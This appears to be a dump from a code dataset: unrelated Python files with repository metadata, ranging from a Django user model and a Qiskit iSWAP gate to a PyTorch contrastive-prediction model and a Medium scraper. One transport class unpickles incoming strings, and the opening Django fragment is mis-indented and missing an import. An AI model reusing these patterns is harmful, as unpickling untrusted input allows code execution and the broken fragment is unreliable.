from django.db import models
from accounts.managers import UserManager
GENDER_CHOICES = (
('male', 'Male'),
('female', 'Female'))
class User(AbstractUser):
username = None
role = models.CharField(max_length=12, error_messages={
'required': "Role must be provided"
})
    gender = models.CharField(max_length=10, choices=GENDER_CHOICES, blank=True, null=True, default="")
email = models.EmailField(unique=True, blank=False,
error_messages={
'unique': "A user with that email already exists.",
})
USERNAME_FIELD = "email"
REQUIRED_FIELDS = []
    def __str__(self):
        return self.email
objects = UserManager()
| 24.8125 | 85 | 0.602015 |
b715abd31d940bf28f8a1650d690409f9161bddd | 841 | py | Python | lab/device/protocol.py | ParanoiaSYT/Qulab-backup | 09ec5457145b3789d4c1ac02c43dd3e6dfafc96f | [
"MIT"
] | null | null | null | lab/device/protocol.py | ParanoiaSYT/Qulab-backup | 09ec5457145b3789d4c1ac02c43dd3e6dfafc96f | [
"MIT"
] | null | null | null | lab/device/protocol.py | ParanoiaSYT/Qulab-backup | 09ec5457145b3789d4c1ac02c43dd3e6dfafc96f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import pickle
import base64
import json
DEFAULT_PORT = 8123
class Transport():
def __init__(self):
self.protocol = pickle.HIGHEST_PROTOCOL
def pack(self, obj):
buff = pickle.dumps(obj, protocol=self.protocol)
return base64.b64encode(buff).decode()
def unpack(self, s):
buff = base64.b64decode(s)
return pickle.loads(buff)
def encode(self, obj, protocol=None):
protocol = self.protocol if protocol is None else protocol
data = {
'protocol': protocol,
'body': self.pack(obj)
}
return json.dumps(data)
def decode(self, s):
data = json.loads(s)
return self.unpack(data['body'])
def highest_protocol(self):
return pickle.HIGHEST_PROTOCOL
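# Minimal round-trip demo (illustrative addition, not part of the original file).
if __name__ == '__main__':
    t = Transport()
    payload = {'freq': 6.5e9, 'points': [1, 2, 3]}
    wire = t.encode(payload)  # JSON envelope carrying a base64-encoded pickle
    assert t.decode(wire) == payload
    print('round-trip OK, protocol', t.highest_protocol())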
| 24.735294 | 67 | 0.587396 |
04ac3e36b008c0861a5a064884b8fe44c41fa7dd | 15,490 | py | Python | uc-dpc/model_3d.py | lovish1234/TPC | 10e93eeb0e22e411579cfb9f94fac7870f6e2039 | [
"MIT"
] | null | null | null | uc-dpc/model_3d.py | lovish1234/TPC | 10e93eeb0e22e411579cfb9f94fac7870f6e2039 | [
"MIT"
] | null | null | null | uc-dpc/model_3d.py | lovish1234/TPC | 10e93eeb0e22e411579cfb9f94fac7870f6e2039 | [
"MIT"
] | null | null | null | # get the model as DPC-RNN
import sys
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
sys.path.append('../uc-backbone')
# to extract the features
from select_backbone import select_resnet
# to aggregate the features in one
from convrnn import ConvGRU
class DPC_RNN(nn.Module):
'''DPC with RNN'''
def __init__(self,
sample_size,
num_seq=8,
seq_len=5,
pred_step=3,
network='resnet10',
distance='L2',
distance_type='uncertain',
positive_vs_negative='same',
radius_type='linear',
radius_which='pred'):
super(DPC_RNN, self).__init__()
# to reproduce the experiments
torch.cuda.manual_seed(233)
print('[model_3d.py] Using DPC-RNN model')
        # spatial size (height/width) of the input frames
self.sample_size = sample_size
self.num_seq = num_seq
self.seq_len = seq_len
self.distance = distance
self.distance_type = distance_type
self.positive_vs_negative = positive_vs_negative
self.radius_which = radius_which
self.radius_type = radius_type
print('[model_3d.py] Using distance metric : ', self.distance)
print('[model_3d.py] Using distance type : ', self.distance_type)
print('[model_3d.py] Treating positive and negative instances as : ',
self.positive_vs_negative)
print('[model_3d.py] Using radius type : ', self.radius_type)
# how many futures to predict
self.pred_step = pred_step
        # temporal extent of the final feature map: ceil(seq_len/2) for
        # resnet8/10 (3 if seq_len is 5), ceil(seq_len/4) otherwise
if network == 'resnet8' or network == 'resnet10':
self.last_duration = int(math.ceil(seq_len / 2))
else:
self.last_duration = int(math.ceil(seq_len / 4))
self.last_size = int(math.ceil(sample_size / 32))
# print('final feature map has size %dx%d' %
# (self.last_size, self.last_size))
        # f - choose an appropriate feature extractor. In this case, a resnet
self.backbone, self.param = select_resnet(
network, track_running_stats=False,
distance_type=self.distance_type,
radius_type=self.radius_type)
#print (self.param)
# number of layers in GRU
self.param['num_layers'] = 1 # param for GRU
self.param['hidden_size'] = self.param['feature_size'] # param for GRU
self.agg = ConvGRU(input_size=self.param['feature_size'],
hidden_size=self.param['hidden_size'],
kernel_size=1,
num_layers=self.param['num_layers'],
radius_type=self.radius_type)
# two layered network \phi
self.network_pred = nn.Sequential(
nn.Conv2d(self.param['feature_size'],
self.param['feature_size'], kernel_size=1, padding=0),
nn.ReLU(inplace=True),
nn.Conv2d(self.param['feature_size'],
self.param['feature_size'], kernel_size=1, padding=0)
)
if self.radius_type == 'log' and self.distance_type == 'uncertain':
print('[model_3d.py] Using log as radius_type')
self.activation = exp_activation()
        # mask of positive/negative pair labels; built lazily in forward()
self.mask = None
self.relu = nn.ReLU(inplace=False)
self._initialize_weights(self.agg)
self._initialize_weights(self.network_pred)
def forward(self, block):
# block: [B, N, C, SL, W, H]
### extract feature ###
        # [Batch, Number of sequences, Channels, Sequence Length, Height, Width]
(B, N, C, SL, H, W) = block.shape
# [ 4, 8, 3, 256, 128, 128 ]
# batch and number of sequences can be combined
block = block.view(B * N, C, SL, H, W)
# [ 32, 3, 256, 128, 128 ]
# pass through backbone (f)
feature = self.backbone(block)
#[32, 256, 2, 4, 4]
# if self.distance == 'circle' and self.radius_type=='log':
# # predict abs(r) instead of (r)
# feature[:,-1,:,:,:] = torch.exp(feature[:,-1,:,:,:])
del block
# pool{2} as denoted in the paper
feature = F.avg_pool3d(
feature, (self.last_duration, 1, 1), stride=(1, 1, 1))
# [32, 256, 1, 4, 4]
# In case we use circle loss, this would be [32, 257, 1, 4, 4]
        # keep the pre-ReLU feature map (radius channel included, if any)
        # as the ground truth for the contrastive score
        # print(self.param['feature_size'], feature.shape)
feature_inf_all = feature.view(
B, N, self.param['feature_size'], self.last_size, self.last_size) # before ReLU, (-inf, +inf)
# [4, 8, 256, 4, 4]
feature = self.relu(feature) # [0, +inf)
# [32, 256, 1, 4, 4]
# [B,N,D,6,6], [0, +inf)
feature = feature.view(
B, N, self.param['feature_size'], self.last_size, self.last_size)
# [4, 8, 256, 4, 4]
        # .contiguous() returns a contiguous copy so the later view() is valid
gt = feature_inf_all[:, N - self.pred_step::, :].contiguous()
# [4, 3, 256, 4, 4]
del feature_inf_all
### aggregate, predict future ###
# [4, 5, 256, 4, 4]
_, hidden = self.agg(feature[:, 0:N - self.pred_step, :].contiguous())
# [4, 1, 256, 4, 4]
# after tanh, (-1,1). get the hidden state of last layer, last time step
hidden = hidden[:, -1, :]
# [4, 256, 4, 4]
# get the results for pre_step number of steps
pred = []
for i in range(self.pred_step):
# sequentially pred future for pred_step number of times
#print (hidden.shape)
p_tmp = self.network_pred(hidden)
#print (p_tmp[:,-1,:,:])
if self.distance_type == 'uncertain' and self.radius_type == 'log':
p_tmp = self.activation(p_tmp)
#print (p_tmp[:,-1,:,:])
pred.append(p_tmp)
# take hidden state along with encoding
_, hidden = self.agg(
self.relu(p_tmp).unsqueeze(1), hidden.unsqueeze(0))
hidden = hidden[:, -1, :]
#[4, 256, 4, 4]
pred = torch.stack(pred, 1) # B, pred_step, xxx
#[4, 3, 256, 4, 4]
del hidden
### Get similarity score ###
# pred: [B, pred_step, D, last_size, last_size]
# GT: [B, N, D, last_size, last_size]
N = self.pred_step
# dot product D dimension in pred-GT pair, get a 6d tensor. First 3 dims are from pred, last 3 dims are from GT.
# predicted
pred = pred.permute(0, 1, 3, 4, 2).contiguous().view(
B * self.pred_step * self.last_size**2, self.param['feature_size'])
# leave the radius out
if self.distance_type == 'uncertain':
pred_embedding = pred[:, :-1]
pred_radius = pred[:, -1].expand(1, -1)
elif self.distance_type == 'certain':
pred_embedding = pred
# GT
gt = gt.permute(0, 1, 3, 4, 2).contiguous().view(
B * N * self.last_size**2, self.param['feature_size'])
# leave the radius out
if self.distance_type == 'uncertain':
gt_embedding = gt[:, :-1]
gt_radius = gt[:, -1].expand(1, -1)
elif self.distance_type == 'certain':
gt_embedding = gt
# dot product to get the score
# change this using einstein notation
if self.distance == 'dot':
gt_embedding = gt_embedding.transpose(0, 1)
score = torch.matmul(pred_embedding, gt_embedding)
# print(score)
elif self.distance == 'cosine':
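            # cosine(p, g) = <p, g> / (||p|| * ||g||): one matmul for all pairs,
            # then divide rows by ||pred|| and columns by ||gt||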
pred_norm = torch.norm(pred_embedding, dim=1)
gt_norm = torch.norm(gt_embedding, dim=1)
#print(pred_embedding.shape, pred_norm.shape, pred_norm.expand(1,-1).shape)
#print(gt_embedding.shape, gt_norm.shape, gt_norm.expand(1,-1).shape)
gt_embedding = gt_embedding.transpose(0, 1)
score = torch.matmul(pred_embedding, gt_embedding)
#print("score shape: (%d, %d)" % (score.shape[0], score.shape[1]))
# print("max value of dot product: %f" %
# torch.max(score).detach().cpu().numpy())
# print("min value of dot product: %f" %
# torch.min(score).detach().cpu().numpy())
# normalizing with magnitudes
# row-wise division
score = torch.div(score, pred_norm.expand(1, -1).T)
# column-wise division
score = torch.div(score, gt_norm)
# print("max value of cosine: %f" %
# np.max(score.detach().cpu().numpy()))
# print("min value of cosine: %f" %
# np.min(score.detach().cpu().numpy()))
del pred_embedding, gt_embedding
# division by the magnitude of respective vectors
elif self.distance == 'L2':
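            # pairwise L2 via broadcasting: (P, 1, D) - (G, D) -> (P, G, D);
            # the einsum sums squared differences over D, giving a (P, G)
            # distance matrix between every prediction and every GT feature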
pred_embedding_mult = pred_embedding.reshape(
pred_embedding.shape[0], 1, pred_embedding.shape[1])
difference = pred_embedding_mult - gt_embedding
score = torch.sqrt(torch.einsum(
'ijk,ijk->ij', difference, difference))
# print(score)
del pred_embedding_mult, gt_embedding, difference
        # branch on the certainty of distances (radius channel vs. none)
if self.distance_type == 'uncertain':
if self.radius_which == 'pred':
#print ('[model_3d.py] Using the pred radii of tube')
# .view(B, self.pred_step, self.last_size**2, B, N, self.last_size**2)
#print (score.shape, pred_radius.shape)
final_score = (score - pred_radius.T).contiguous()
elif self.radius_which == 'gt':
#print ('[model_3d.py] Using the ground truth radii of tube')
# .view(B, self.pred_step, self.last_size**2, B, N, self.last_size**2)
#print (score.shape, gt_radius.shape)
final_score = (score - gt_radius).contiguous()
zero_tensor = torch.zeros_like(final_score)
# treat both positive and negative instances as same wrt score function
if self.positive_vs_negative == 'same':
#print ('[model_3d.py] Setting distance_type to same')
final_score = torch.max(torch.stack(
[final_score, zero_tensor]), axis=0).values
del zero_tensor
elif self.positive_vs_negative == 'different':
#print ('[model_3d.py] Setting distance_type to different')
# check if it's a positive or negative instance
# if positive leave as is
# if negative multiply with -1
ones_tensor = -torch.ones_like(final_score)
torch.diagonal(ones_tensor).fill_(1.0)
# invert the score if negatives, take maximum
final_score = torch.max(torch.stack(
[final_score * ones_tensor, zero_tensor]), axis=0).values
# corresponding to first block - take first column
del zero_tensor, ones_tensor
elif self.distance_type == 'certain':
# .view(B, self.pred_step, self.last_size**2, B, N, self.last_size**2)
final_score = score.contiguous()
zero_tensor = torch.zeros_like(final_score)
if self.positive_vs_negative == 'same':
#print ('[model_3d.py] Setting distance_type to same')
final_score = torch.max(torch.stack(
[final_score, zero_tensor]), axis=0).values
del zero_tensor
elif self.positive_vs_negative == 'different':
ones_tensor = -torch.ones_like(final_score)
torch.diagonal(ones_tensor).fill_(1.0)
final_score = torch.max(torch.stack(
[final_score * ones_tensor, zero_tensor]), axis=0).values
#print (final_score)
del zero_tensor, ones_tensor
del score
# Mask Calculation
if self.mask is None: # only compute mask once
# mask meaning:
# -2: omit,
# -1: temporal neg (hard),
# 0: easy neg,
# 1: pos,
# -3: spatial neg
# easy negatives (do not take gradient here)
mask = torch.zeros((B, self.pred_step, self.last_size**2, B, N, self.last_size**2),
dtype=torch.int8, requires_grad=False).detach().cuda()
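            # mask shape: (B, pred_step, S, B, N, S) with S = last_size**2;
            # each entry labels one (prediction, ground-truth) feature pair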
# spatial negative (mark everything in the same batch as spatial negative)
mask[torch.arange(B), :, :, torch.arange(B),
:, :] = -3 # spatial neg
            # temporal negative
for k in range(B):
mask[k, :, torch.arange(
self.last_size**2), k, :, torch.arange(self.last_size**2)] = -1 # temporal neg
# positive
tmp = mask.permute(0, 2, 1, 3, 5, 4).contiguous().view(
B * self.last_size**2, self.pred_step, B * self.last_size**2, N)
for j in range(B * self.last_size**2):
tmp[j, torch.arange(self.pred_step), j, torch.arange(
N - self.pred_step, N)] = 1 # pos
mask = tmp.view(B, self.last_size**2, self.pred_step,
B, self.last_size**2, N).permute(0, 2, 1, 3, 5, 4)
self.mask = mask
# final_score returned as predxGT matrix
return [final_score, self.mask]
def _initialize_weights(self, module):
for name, param in module.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.orthogonal_(param, 1)
# other resnet weights have been initialized in resnet itself
def reset_mask(self):
self.mask = None
class exp_activation(nn.Module):
def __init__(self):
'''
Init method.
'''
super().__init__() # init the base class
def forward(self, input):
'''
Forward pass of the function.
'''
return exp_radius(input)
def exp_radius(input):
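    # exponentiate only the last channel (the tube radius) so the learned
    # log-radius always maps to a strictly positive radius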
input[:, -1, :, :] = torch.exp(input[:, -1, :, :])
return input
if __name__ == '__main__':
mymodel = DPC_RNN(128, num_seq=8, seq_len=5, pred_step=3,
distance='L2',
distance_type='uncertain',
positive_vs_negative='different',
radius_type='linear',
radius_which='pred',
network='resnet18')
mymodel = mymodel.cuda()
# (B, N, C, SL, H, W)
mydata = torch.cuda.FloatTensor(1, 8, 3, 5, 128, 128)
    nn.init.uniform_(mydata, 100, 100000)
#import ipdb; ipdb.set_trace()
mymodel(mydata)
# x = torch.tensor([[1,1,1],[2,2,2],[3,3,3],[4,4,4]])
# y = torch.tensor([[8,8,8],[16,16,16],[32,32,32],[64,64,64]])
# x_em = x[:,:-1]
# y_em = y[:,:-1]
# x_ri = x[:,-1].expand(1,-1)
# z = y_em.reshape(y_em.shape[0], 1, y_em.shape[1])
# difference = z - x_em
# score = torch.sqrt(torch.einsum('ijk,ijk->ij', difference, difference).float())
# score = score - x_ri
# score = score.permute(1,0) | 38.152709 | 120 | 0.548031 |
d63ac8130ce0602008d67e956f34d70154c33824 | 1,029 | py | Python | python_code/vnev/Lib/site-packages/jdcloud_sdk/services/vqd/client/VqdClient.py | Ureimu/weather-robot | 7634195af388538a566ccea9f8a8534c5fb0f4b6 | [
"MIT"
] | 14 | 2018-04-19T09:53:56.000Z | 2022-01-27T06:05:48.000Z | python_code/vnev/Lib/site-packages/jdcloud_sdk/services/vqd/client/VqdClient.py | Ureimu/weather-robot | 7634195af388538a566ccea9f8a8534c5fb0f4b6 | [
"MIT"
] | 15 | 2018-09-11T05:39:54.000Z | 2021-07-02T12:38:02.000Z | python_code/vnev/Lib/site-packages/jdcloud_sdk/services/vqd/client/VqdClient.py | Ureimu/weather-robot | 7634195af388538a566ccea9f8a8534c5fb0f4b6 | [
"MIT"
] | 33 | 2018-04-20T05:29:16.000Z | 2022-02-17T09:10:05.000Z | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudclient import JDCloudClient
from jdcloud_sdk.core.config import Config
class VqdClient(JDCloudClient):
def __init__(self, credential, config=None, logger=None):
if config is None:
config = Config('vqd.jdcloud-api.com')
super(VqdClient, self).__init__(credential, config, 'vqd', '0.1.1', logger)
| 34.3 | 83 | 0.74344 |
8d753c3a70719e75e183676ee66dc5cff5bfecd3 | 2,175 | py | Python | setup.py | AakashGfude/jupyter-cache | ffdbe9b541e97f60f4123bd66fa450c8ba0bfe26 | [
"MIT"
] | null | null | null | setup.py | AakashGfude/jupyter-cache | ffdbe9b541e97f60f4123bd66fa450c8ba0bfe26 | [
"MIT"
] | null | null | null | setup.py | AakashGfude/jupyter-cache | ffdbe9b541e97f60f4123bd66fa450c8ba0bfe26 | [
"MIT"
] | null | null | null | """jupyter-cache package setup."""
from importlib import import_module
from setuptools import find_packages, setup
setup(
name="jupyter-cache",
version=import_module("jupyter_cache").__version__,
description=("A defined interface for working with a cache of jupyter notebooks."),
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
url="https://github.com/ExecutableBookProject/jupyter-cache",
author="Chris Sewell",
author_email="chrisj_sewell@hotmail.com",
license="MIT",
packages=find_packages(),
entry_points={
"console_scripts": ["jcache = jupyter_cache.cli.commands.cmd_main:jcache"],
"jupyter_executors": [
"basic = jupyter_cache.executors.basic:JupyterExecutorBasic"
],
},
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
],
python_requires=">=3.6",
# note: nbdime could be made an extra
install_requires=[
"attrs",
"nbformat",
"nbdime",
# "nbclient~=0.1",
"nbconvert",
"sqlalchemy~=1.3.12",
],
extras_require={
"cli": ["click", "click-completion", "click-log", "tabulate", "pyyaml"],
"code_style": ["flake8<3.8.0,>=3.7.0", "black", "pre-commit==1.17.0"],
"testing": [
"coverage",
"pytest>=3.6,<4",
"pytest-cov",
"pytest-regressions",
"matplotlib",
"numpy",
"sympy",
"pandas",
],
"rtd": ["myst-nb~=0.7", "sphinx-copybutton", "pydata-sphinx-theme"],
},
zip_safe=True,
)
| 35.080645 | 87 | 0.584828 |
6df3dcd55ef9f82efbe0fabdd9ce1c28a8782d35 | 3,188 | py | Python | qiskit/circuit/library/standard_gates/iswap.py | siddharthdangwal/qiskit-terra | af34eb06f28de18ef276e1e9029c62a4e35dd6a9 | [
"Apache-2.0"
] | null | null | null | qiskit/circuit/library/standard_gates/iswap.py | siddharthdangwal/qiskit-terra | af34eb06f28de18ef276e1e9029c62a4e35dd6a9 | [
"Apache-2.0"
] | null | null | null | qiskit/circuit/library/standard_gates/iswap.py | siddharthdangwal/qiskit-terra | af34eb06f28de18ef276e1e9029c62a4e35dd6a9 | [
"Apache-2.0"
] | 1 | 2020-07-13T17:56:46.000Z | 2020-07-13T17:56:46.000Z | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""iSWAP gate."""
import numpy as np
from qiskit.circuit.gate import Gate
from qiskit.circuit.quantumregister import QuantumRegister
class iSwapGate(Gate):
r"""iSWAP gate.
A 2-qubit XX+YY interaction.
This is a Clifford and symmetric gate. Its action is to swap two qubit
states and phase the :math:`|01\rangle` and :math:`|10\rangle`
amplitudes by i.
**Circuit Symbol:**
.. parsed-literal::
q_0: ─⨂─
│
q_1: ─⨂─
**Reference Implementation:**
.. parsed-literal::
┌───┐┌───┐ ┌───┐
q_0: ┤ S ├┤ H ├──■──┤ X ├─────
├───┤└───┘┌─┴─┐└─┬─┘┌───┐
q_1: ┤ S ├─────┤ X ├──■──┤ H ├
└───┘ └───┘ └───┘
**Matrix Representation:**
.. math::
iSWAP = R_{XX+YY}(-\frac{\pi}{2})
= exp(i \frac{\pi}{4} (X{\otimes}X+Y{\otimes}Y)) =
\begin{pmatrix}
1 & 0 & 0 & 0 \\
0 & 0 & i & 0 \\
0 & i & 0 & 0 \\
0 & 0 & 0 & 1
\end{pmatrix}
This gate is equivalent to a SWAP up to a diagonal.
.. math::
iSWAP =
\begin{pmatrix}
1 & 0 & 0 & 0 \\
0 & 0 & 1 & 0 \\
0 & 1 & 0 & 0 \\
0 & 0 & 0 & 1
\end{pmatrix}
. \begin{pmatrix}
1 & 0 & 0 & 0 \\
0 & i & 0 & 0 \\
0 & 0 & i & 0 \\
0 & 0 & 0 & 1
\end{pmatrix}
"""
def __init__(self):
"""Create new iSwap gate."""
super().__init__('iswap', 2, [])
def _define(self):
"""
gate iswap a,b {
s q[0];
s q[1];
h q[0];
cx q[0],q[1];
cx q[1],q[0];
h q[1];
}
"""
# pylint: disable=cyclic-import
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .h import HGate
from .s import SGate
from .x import CXGate
q = QuantumRegister(2, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(SGate(), [q[0]], []),
(SGate(), [q[1]], []),
(HGate(), [q[0]], []),
(CXGate(), [q[0], q[1]], []),
(CXGate(), [q[1], q[0]], []),
(HGate(), [q[1]], [])
]
qc.data = rules
self.definition = qc
def to_matrix(self):
"""Return a numpy.array for the iSWAP gate."""
return np.array([[1, 0, 0, 0],
[0, 0, 1j, 0],
[0, 1j, 0, 0],
[0, 0, 0, 1]], dtype=complex)
| 26.789916 | 77 | 0.440088 |
64e025296dd76c7046ecdb35b08dd9cb55092d34 | 238 | py | Python | pycouchdb/__init__.py | almararamara/py-couchdb | cb85366023f65e50387c07b93549150801115a08 | [
"BSD-3-Clause"
] | 62 | 2015-03-30T07:39:24.000Z | 2021-12-07T08:54:10.000Z | pycouchdb/__init__.py | almararamara/py-couchdb | cb85366023f65e50387c07b93549150801115a08 | [
"BSD-3-Clause"
] | 31 | 2015-04-26T20:21:28.000Z | 2021-11-06T11:31:35.000Z | pycouchdb/__init__.py | almararamara/py-couchdb | cb85366023f65e50387c07b93549150801115a08 | [
"BSD-3-Clause"
] | 19 | 2015-06-05T13:03:45.000Z | 2021-11-04T04:53:24.000Z | # -*- coding: utf-8 -*-
__author__ = "Andrey Antukh"
__license__ = "BSD"
__version__ = "1.14.1"
__maintainer__ = "Rinat Sabitov"
__email__ = "rinat.sabitov@gmail.com"
__status__ = "Development"
from .client import Server # noqa: F401
| 19.833333 | 40 | 0.701681 |
053aeb190b0f1714ddfe1e1174fd8db973aeccef | 380 | py | Python | hijack/urls.py | pennersr/django-hijack | 0b97745be1eb7f0ebbf2946f7bdb32f7fc90f736 | [
"MIT"
] | null | null | null | hijack/urls.py | pennersr/django-hijack | 0b97745be1eb7f0ebbf2946f7bdb32f7fc90f736 | [
"MIT"
] | null | null | null | hijack/urls.py | pennersr/django-hijack | 0b97745be1eb7f0ebbf2946f7bdb32f7fc90f736 | [
"MIT"
] | 1 | 2019-09-29T04:50:23.000Z | 2019-09-29T04:50:23.000Z | try:
from django.conf.urls import patterns, url
except ImportError:
from django.conf.urls.defaults import patterns, url
urlpatterns = patterns('hijack.views',
url(r'^email/(?P<email>[\w.%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4})/$', 'login_with_email'),
url(r'^username/(?P<username>\w+)/$', 'login_with_username'),
url(r'^(?P<userId>\w+)/$', 'login_with_id'),
)
| 31.666667 | 92 | 0.626316 |
129f1a4cf432b2a4f9d8250e94e41076836e9e9b | 2,481 | py | Python | __scraping__/medium.com/main.py | whitmans-max/python-examples | 881a8f23f0eebc76816a0078e19951893f0daaaa | [
"MIT"
] | 140 | 2017-02-21T22:49:04.000Z | 2022-03-22T17:51:58.000Z | __scraping__/medium.com/main.py | whitmans-max/python-examples | 881a8f23f0eebc76816a0078e19951893f0daaaa | [
"MIT"
] | 5 | 2017-12-02T19:55:00.000Z | 2021-09-22T23:18:39.000Z | __scraping__/medium.com/main.py | whitmans-max/python-examples | 881a8f23f0eebc76816a0078e19951893f0daaaa | [
"MIT"
] | 79 | 2017-01-25T10:53:33.000Z | 2022-03-11T16:13:57.000Z | #!/usr/bin/env python3
# date: 2020.02.24
# https://stackoverflow.com/questions/60383237/itemloader-in-scrapy/
import scrapy
from scrapy.loader import ItemLoader
from scrapy.spiders import CrawlSpider
import logging
from scrapy.utils.log import configure_logging
class MediumItem(scrapy.Item):
Title = scrapy.Field()
Name = scrapy.Field()
Date = scrapy.Field()
Read = scrapy.Field()
Publication = scrapy.Field()
Claps = scrapy.Field()
Responses = scrapy.Field()
Page = scrapy.Field()
class DataSpider(CrawlSpider):
custom_settings = {
'LOG_FILE': 'my_log.log',
'LOG_LEVEL': 'ERROR'}
logging.getLogger().addHandler(logging.StreamHandler())
name = 'data'
allowed_domains = ['medium.com', 'towardsdatascience.com']
start_urls = ['https://medium.com/tag/python/archive/02/01']
#handle_httpstatus_list = [302]
def parse(self,response):
print('url:', response.url)
articles = response.xpath('//div[@class="postArticle postArticle--short js-postArticle js-trackPostPresentation js-trackPostScrolls"]')
for article in articles:
if article.xpath('.//a[@class="button button--smaller button--chromeless u-baseColor--buttonNormal"]/@href').extract_first():
l = ItemLoader(item = MediumItem(), selector = article)
l.default_output_processor = scrapy.loader.processors.TakeFirst()
l.add_css('Title','div > h3::text')
l.add_xpath('Name','.//a[@class="ds-link ds-link--styleSubtle link link--darken link--accent u-accentColor--textNormal u-accentColor--textDarken"]/text()')
l.add_css('Read','span::attr(title)')
l.add_xpath('Publication', './/a[@class="ds-link ds-link--styleSubtle link--darkenlink--accent u-accentColor--textNormal"]/text()')
l.add_xpath('Claps','.//button[@class="button button--chromeless u-baseColor--buttonNormal js-multirecommendCountButton u-disablePointerEvents"]/text()')
l.add_xpath('Responses','.//a[@class="button button--chromeless u-baseColor--buttonNormal"]/text()')
l.add_value('Page', response.url)
yield l.load_item()
from scrapy.crawler import CrawlerProcess
c = CrawlerProcess({
'USER_AGENT': 'Mozilla/5.0',
# save in file CSV, JSON or XML
'FEED_FORMAT': 'csv', # csv, json, xml
'FEED_URI': 'output.csv', #
})
c.crawl(DataSpider)
c.start()
| 42.050847 | 171 | 0.654172 |
f4165a257ca8edcf93a8c836fc0916ef701bf094 | 2,801 | py | Python | nova/tests/datastore_unittest.py | bopopescu/cc | 5c14efcda95c4987532484c84a885a3b07efc984 | [
"Apache-2.0"
] | null | null | null | nova/tests/datastore_unittest.py | bopopescu/cc | 5c14efcda95c4987532484c84a885a3b07efc984 | [
"Apache-2.0"
] | 1 | 2020-08-02T15:40:49.000Z | 2020-08-02T15:40:49.000Z | nova/tests/datastore_unittest.py | bopopescu/cc | 5c14efcda95c4987532484c84a885a3b07efc984 | [
"Apache-2.0"
] | 1 | 2020-07-25T17:56:39.000Z | 2020-07-25T17:56:39.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2010 Anso Labs, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import test
from nova import datastore
import random
class KeeperTestCase(test.BaseTestCase):
"""
Basic persistence tests for Keeper datastore.
Generalize, then use these to support
migration to redis / cassandra / multiple stores.
"""
def __init__(self, *args, **kwargs):
"""
Create a new keeper instance for test keys.
"""
super(KeeperTestCase, self).__init__(*args, **kwargs)
self.keeper = datastore.Keeper('test-')
def tear_down(self):
"""
Scrub out test keeper data.
"""
pass
def test_store_strings(self):
"""
Confirm that simple strings go in and come out safely.
Should also test unicode strings.
"""
randomstring = ''.join(
[random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-')
for _x in xrange(20)]
)
self.keeper['test_string'] = randomstring
self.assertEqual(randomstring, self.keeper['test_string'])
def test_store_dicts(self):
"""
Arbitrary dictionaries should be storable.
"""
test_dict = {'key_one': 'value_one'}
self.keeper['test_dict'] = test_dict
self.assertEqual(test_dict['key_one'],
self.keeper['test_dict']['key_one'])
def test_sets(self):
"""
A keeper dict should be self-serializing.
"""
self.keeper.set_add('test_set', 'foo')
test_dict = {'arbitrary': 'dict of stuff'}
self.keeper.set_add('test_set', test_dict)
self.assertTrue(self.keeper.set_is_member('test_set', 'foo'))
self.assertFalse(self.keeper.set_is_member('test_set', 'bar'))
self.keeper.set_remove('test_set', 'foo')
self.assertFalse(self.keeper.set_is_member('test_set', 'foo'))
rv = self.keeper.set_fetch('test_set')
self.assertEqual(test_dict, rv.next())
self.keeper.set_remove('test_set', test_dict)
| 34.580247 | 78 | 0.647269 |
80d6c226fd66b00de6e1e673817a7c261e17effe | 2,076 | py | Python | save_beta_residue.py | helloTC/Rest_activation_prediction | f67cfe221d9f63afd67a2a5ef6330b8519ca7641 | [
"MIT"
] | null | null | null | save_beta_residue.py | helloTC/Rest_activation_prediction | f67cfe221d9f63afd67a2a5ef6330b8519ca7641 | [
"MIT"
] | null | null | null | save_beta_residue.py | helloTC/Rest_activation_prediction | f67cfe221d9f63afd67a2a5ef6330b8519ca7641 | [
"MIT"
] | null | null | null | import framework_rt as fr
from os.path import join as pjoin
import cifti
from ATT.iofunc import iofiles
from sklearn import linear_model
import numpy as np
from scipy import stats
from ATT.algorithm import tools
with open('/nfs/s2/userhome/huangtaicheng/hworkingshop/hcp_test/tables/subjIC_sessid', 'r') as f:
subjID = f.read().splitlines()
subjID = subjID[:203]
nsubj = len(subjID)
